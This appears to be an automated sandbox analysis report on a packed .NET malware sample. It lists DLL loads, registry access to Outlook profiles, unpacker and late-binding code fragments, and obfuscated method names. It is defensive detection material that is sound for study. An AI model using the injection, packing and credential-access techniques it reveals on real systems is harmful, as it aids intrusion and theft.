Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: tquery.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\SearchProtocolHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: FGGx944Qu7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FGGx944Qu7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: usFxdnRPYjnb.exe, 0000000F.00000000.1869462009.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp, usFxdnRPYjnb.exe, 00000013.00000000.2032183269.0000000000FAE000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: FGGx944Qu7.exe, FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1947640704.00000000030E9000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.000000000342E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.1945593903.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2864118086.0000000003290000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdbUGP source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: SearchProtocolHost.pdb source: usFxdnRPYjnb.exe, 0000000F.00000003.1884595652.0000000000C8B000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: FGGx944Qu7.exe, Form1.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"EmuLister"}}, (string[])null, (bool[])null)
Source: TBsjWljiCpR.exe.0.dr, Form1.cs	.Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{EIK[0],EIK[1],"EmuLister"}}, (string[])null, (bool[])null)

.NET source code contains potential unpacker

Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.4019970.6.raw.unpack, LoginForm.cs	.Net Code: _200E_202E_200D_206C_202E_206B_200C_200E_206F_206F_202A_206E_202D_206B_206F_202A_202A_206C_206C_200C_206B_206E_202A_206D_200D_202B_200F_206A_202E_200B_202A_202E_202B_202C_200C_202A_206C_202A_206B_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	.Net Code: Obi6Qd2fZa System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041E15D push FFFFFFB6h; retf
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041E19F push FFFFFFB6h; retf
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00416234 pushfd ; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00407A3A push ebx; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401A3D push ds; ret
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004162B5 push edi; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040CB07 push edi; retf
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0041838B push cs; retf
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040CD7A push ss; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00403500 push eax; ret
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040AD09 push edx; ret
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00413D36 push esp; retf
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401D80 push 720ECF9Eh; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040DF0F push edx; iretd
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F09AD push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C54D pushfd ; ret
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C54F push 8B010167h; ret
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010409AD push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108C9D7 push edi; ret
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01011200 push eax; iretd
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01011FEC push eax; iretd
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01097E99 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_00418294 push edi; iretd
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0041838B push cs; retf

Source: FGGx944Qu7.exe	Static PE information: section name: .text entropy: 7.9850458366692925
Source: TBsjWljiCpR.exe.0.dr	Static PE information: section name: .text entropy: 7.9850458366692925

Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
